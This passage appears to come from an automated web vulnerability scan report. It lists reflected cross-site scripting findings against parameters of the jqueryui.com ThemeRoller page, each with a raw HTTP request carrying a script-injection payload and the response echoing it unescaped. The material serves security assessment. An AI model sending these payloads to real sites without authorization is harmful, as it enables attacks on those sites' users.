GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9511622"><script>alert(1)</script>2a8698a89ee&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
c88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9511622"><script>alert(1)</script>2a8698a89ee&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

3.149. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803b0"><script>alert(1)</script>c470df28bbc was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55803b0"><script>alert(1)</script>c470df28bbc&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
eTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55803b0"><script>alert(1)</script>c470df28bbc&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorCon
...[SNIP]...

3.150. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93d9"><script>alert(1)</script>d8f0585ac03 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55c93d9"><script>alert(1)</script>d8f0585ac03&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55c93d9"><script>alert(1)</script>d8f0585ac03&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

3.151. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2f63"><script>alert(1)</script>a1fb44a8ffa was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75a2f63"><script>alert(1)</script>a1fb44a8ffa&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75a2f63"><script>alert(1)</script>a1fb44a8ffa&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd
...[SNIP]...

3.152. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f060"><script>alert(1)</script>f4d625fbe8f was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=05f060"><script>alert(1)</script>f4d625fbe8f&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=05f060"><script>alert(1)</script>f4d625fbe8f&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

3.153. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7ccc"><script>alert(1)</script>1d5996565c3 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0f7ccc"><script>alert(1)</script>1d5996565c3&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0f7ccc"><script>alert(1)</script>1d5996565c3&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.154. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420d7"><script>alert(1)</script>43bc00d2166 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png420d7"><script>alert(1)</script>43bc00d2166&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png420d7"><script>alert(1)</script>43bc00d2166&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHig
...[SNIP]...

3.155. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd29c"><script>alert(1)</script>6b56a51ca68 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.pngfd29c"><script>alert(1)</script>6b56a51ca68&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.pngfd29c"><script>alert(1)</script>6b56a51ca68&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcD
...[SNIP]...

3.156. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88bc"><script>alert(1)</script>371ad7ef019 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.pnga88bc"><script>alert(1)</script>371ad7ef019&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.pnga88bc"><script>alert(1)</script>371ad7ef019&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f
...[SNIP]...

3.157. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80133"><script>alert(1)</script>785ff6f694b was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

